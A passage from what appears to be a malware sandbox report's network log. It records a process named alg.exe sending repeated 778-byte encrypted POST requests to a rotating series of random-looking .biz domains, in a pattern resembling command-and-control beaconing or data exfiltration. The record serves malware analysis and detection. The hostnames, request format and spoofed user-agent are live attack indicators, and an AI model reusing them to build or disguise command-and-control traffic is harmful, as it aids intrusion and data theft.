                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:33.266156912 CET778OUTData Raw: 6b ea 6d 93 02 41 50 6a fe 02 00 00 68 9a dd e2 21 b3 f5 1c 5f 52 21 8a 59 ec 00 43 7c f3 71 87 14 57 0d db 33 1b 00 2b 61 29 84 07 f2 5f 4c e5 d0 98 2b 4c 8b 87 dd e4 bf 3c 75 81 cd 37 7f 87 19 92 12 48 ae 72 04 51 ba 85 a2 ef e8 f5 56 2b 44 35
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: kmAPjh!_R!YC|qW3+a)_L+L<u7HrQV+D5au8(]Mnmop]c\QrP0)oDx$Ywd:{DlNTbw!XX^>H83c(U-ecJ($GuIJ^<,U*B_KX&O+Q T
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.118547916 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=e235e6545be49d40304bd7fc834f4e94|155.94.241.188|1730130753|1730130753|0|1|0; path=/; domain=.fgajqjyhr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  111192.168.2.55998718.208.156.248802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.138528109 CET344OUTPOST /b HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: hagujcj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.138571978 CET778OUTData Raw: 60 db 18 46 3d 46 0c 08 fe 02 00 00 4f 55 dc ef 91 8b 59 85 b6 c7 88 9b d8 72 42 65 aa 66 5c 8b e2 56 0f a2 5d cd 60 6c ee 8e 9f 91 81 ef 8c f2 53 66 b0 40 7c 41 8a 01 40 09 db 8b fa 56 9e cb 78 f5 40 84 12 48 e5 f7 08 f8 0e 93 a0 27 8d 32 2d 4e
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: `F=FOUYrBef\V]`lSf@|A@Vx@H'2-N[wELA.'Q$klrecZnf?L\)<cS}Ed~Y[pdkd4M~$G=TUbU]G{pcmVl@%h
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.801428080 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=3bdae8ab21c945df5bf3a0bd941bc137|155.94.241.188|1730130754|1730130754|0|1|0; path=/; domain=.hagujcj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  112192.168.2.55998835.164.78.200802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.821470976 CET350OUTPOST /ljoreepy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: sctmku.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.821496964 CET778OUTData Raw: 27 32 0e 6d a8 5c c2 fb fe 02 00 00 f8 98 22 d6 65 af 6d 4c 55 9a 06 38 9c 6e dd df 81 77 fc 7e a6 e0 c3 cc 3c 83 b7 3c c9 c1 93 e7 bd 1f ca 62 c7 30 6b e0 fc 39 bf df 88 58 ad ac d1 01 7c 50 78 8d 93 32 cb cf 7a f2 bb 04 49 78 75 c2 3a e9 7f 7c
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: '2m\"emLU8nw~<<b0k9X|Px2zIxu:|/x#4tW#altRf`6fUZ4+&*$?RaW`3?ez)I/k/aG5L|NHTxh]8k=+VErIfa#w3@14BDu
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.771967888 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=cf811e51256658c25ba0490b360c81d2|155.94.241.188|1730130755|1730130755|0|1|0; path=/; domain=.sctmku.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  113192.168.2.55998934.211.97.45802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.983169079 CET348OUTPOST /wbxnuro HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: qcrsp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.983206987 CET778OUTData Raw: 17 c2 af 4a c7 15 ca fc fe 02 00 00 55 a2 00 1b 74 84 3d f4 a3 9e 41 1a a2 3a 4f 8a e0 58 51 93 cc 5c cf 31 47 8d 74 db db ed e8 e2 a4 76 d1 f5 31 62 cd 61 33 76 62 a0 d7 b6 ec 9b e1 d5 84 c8 31 06 49 df 00 13 68 16 b8 3d 71 1f 54 e8 77 16 b0 d9
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: JUt=A:OXQ\1Gtv1ba3vb1Ih=qTw{u[ Ee.<71>_Um"LE?HGtW^f9[)@E[QA1Mmmg$5x`'>gjB9sZm.o! ~,>
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:36.832375050 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=1bc53fe4039cec4975682bf37f136db6|155.94.241.188|1730130756|1730130756|0|1|0; path=/; domain=.qcrsp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  114192.168.2.55999044.221.84.105802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.032885075 CET346OUTPOST /ml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: sewlqwcd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.032885075 CET778OUTData Raw: 72 10 5a 7b c6 cb 3a e4 fe 02 00 00 8b 9b 9b d2 45 ec 62 76 22 29 9a ee d4 a0 94 a6 2b 4f 62 fd f7 bc d5 30 8c dc 1d 18 67 06 b0 01 1a 30 42 f0 6b d7 8e 3f 68 d3 52 f2 d3 9d 8d cf 4a 69 83 24 91 6d 41 c1 7d d9 30 a3 0a 4d b1 35 7f 94 76 94 05 5c
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: rZ{:Ebv")+Ob0g0Bk?hRJi$mA}0M5v\\"WC*?.-j"%,.M^Uo$I;=wMYC"t*uqmo7l)@_e%\FDQ#WVq:)<6R]"{cNNW!]VKAa:~^
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.722570896 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=e99d1d698482b47a0b10394928eb1bc1|155.94.241.188|1730130757|1730130757|0|1|0; path=/; domain=.sewlqwcd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  115192.168.2.55999154.244.188.177802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.744014025 CET352OUTPOST /mxtehtsjbw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: dyjdrp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.744014025 CET778OUTData Raw: 69 31 0b 99 90 f6 4f 51 fe 02 00 00 76 21 d1 8e 58 6c c4 97 e5 77 fb 03 6e 0a f3 ee a9 a4 d0 89 e6 ee 82 7c 27 72 28 6b ce 6d 0a a0 a7 37 c7 49 ad 03 a8 33 e4 f2 f6 c8 d8 a6 49 d2 83 92 33 81 ef 67 4e 81 c1 e1 24 9e e6 34 8e 43 22 2d 1c a3 8f d7
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: i1OQv!Xlwn|'r(km7I3I3gN$4C"-7R}"ck(T%2*3BR?f2v,:@lb*3&Vuazb7(3[e:BF%f{;S`]C1$:4B's+mvv9.MQ08#1-
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.610407114 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=edba2fe0c7bedb5f7bc25d236ef8016e|155.94.241.188|1730130758|1730130758|0|1|0; path=/; domain=.dyjdrp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  116192.168.2.55999235.164.78.200802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.659461021 CET349OUTPOST /mcjaqbne HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: napws.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.659503937 CET778OUTData Raw: c7 b0 bc 35 1e d3 19 07 fe 02 00 00 a9 d2 d0 fe 15 d1 76 9b 5b 3b ea c5 5a de 73 b8 05 e4 b8 27 3a 11 63 95 0c 99 cb 6f ac 68 6c aa 78 6e f0 cc 57 82 39 93 a4 a0 c2 a2 49 48 39 b4 42 c2 18 b6 bb f0 1c fb 24 6b 1a 96 45 76 0c cc 3c 74 21 f4 a9 78
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 5v[;Zs':cohlxnW9IH9B$kEv<t!x8a=H?$@)I.p!|cpI:NuD<8XZZk8t8zhD9}Q}K[RuVYg@n@i.a_vW(NE@.5}x
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.470838070 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=ea97f3e585aa56c7ffcafa8c59e966ba|155.94.241.188|1730130759|1730130759|0|1|0; path=/; domain=.napws.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  117192.168.2.55999354.244.188.177802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.582664013 CET360OUTPOST /jpwoteajscxojhae HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: qvuhsaqa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.582695007 CET778OUTData Raw: ef 4f e7 a7 bb b0 af ca fe 02 00 00 15 52 46 2e fe 14 6f c7 44 c6 ec 84 3d 3d f6 4f a8 ae 4b 45 42 f7 8f 4e f1 46 57 56 84 d7 f6 83 cc 0f 63 2f c6 be 3b 78 c1 ad 60 05 8e 26 8b e5 98 73 01 16 72 df 5a 94 f7 d0 92 43 b4 9c 3f 91 75 78 7c 80 8e 0c
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: ORF.oD==OKEBNFWVc/;x`&srZC?ux|SK,}"#KwRFE,e1J:{3,BgRiD<3xGW,D$e8JgE8xV|_K"on?$GQ`%hFf
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:40.422995090 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=d39ca0424fe97c2ea8d7170dd4347136|155.94.241.188|1730130760|1730130760|0|1|0; path=/; domain=.qvuhsaqa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  118192.168.2.55999434.211.97.45802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:40.443310022 CET350OUTPOST /mlvudlfi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: apzzls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:40.443371058 CET778OUTData Raw: e7 3c 5b 59 41 0c 93 fa fe 02 00 00 c7 fa 29 5b a3 09 18 63 8a 74 c0 ef 7b ca c8 e8 26 54 a1 15 66 6c f1 0b 28 f9 ba 5e de 3d 89 d5 5b 0d c5 a3 1d 6e 44 cd c2 d3 e4 11 3a 2e c8 7b f7 d3 ca 56 ab 92 a8 e0 3b f5 f8 b5 5f 05 31 85 94 4c 20 ed 2b 31
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: <[YA)[ct{&Tfl(^=[nD:.{V;_1L +1"FP4*nvz0he-pN[iPx%j2FRHw5yaF@[Pb%HL)*A8cA^-X@:S].}7T&pk2ll>tF
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:41.272118092 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=2084d3f38fed8286e7ce30c8a9add624|155.94.241.188|1730130761|1730130761|0|1|0; path=/; domain=.apzzls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  119192.168.2.55999547.129.31.212802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:41.294508934 CET354OUTPOST /icdmsrmds HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: krnsmlmvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:41.294543028 CET778OUTData Raw: a8 67 83 17 d4 a5 c7 8d fe 02 00 00 85 ff f8 5a 00 e6 e9 29 a5 95 26 0f 9d 91 8e 11 b1 90 88 aa 05 b3 6e e8 00 f0 5c 9c 0b 56 50 d0 95 49 aa 14 f6 4c 55 da 73 20 f1 dd ff 4e 1d d2 6c 67 db 76 8c 03 16 f0 d5 75 50 ec 4d 3f c5 7d b3 5d 05 ff 9b 76
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: gZ)&n\VPILUs NlgvuPM?}]vWw6KuBFHw[S\,Vh?Nws>h>B]5VUE(n]j7GmSj*3aF:`ce!}m?>da0
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.713582993 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=89c218574366bd47e50c1328af618f4c|155.94.241.188|1730130762|1730130762|0|1|0; path=/; domain=.krnsmlmvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  120192.168.2.55999654.244.188.177802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.735892057 CET345OUTPOST /n HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
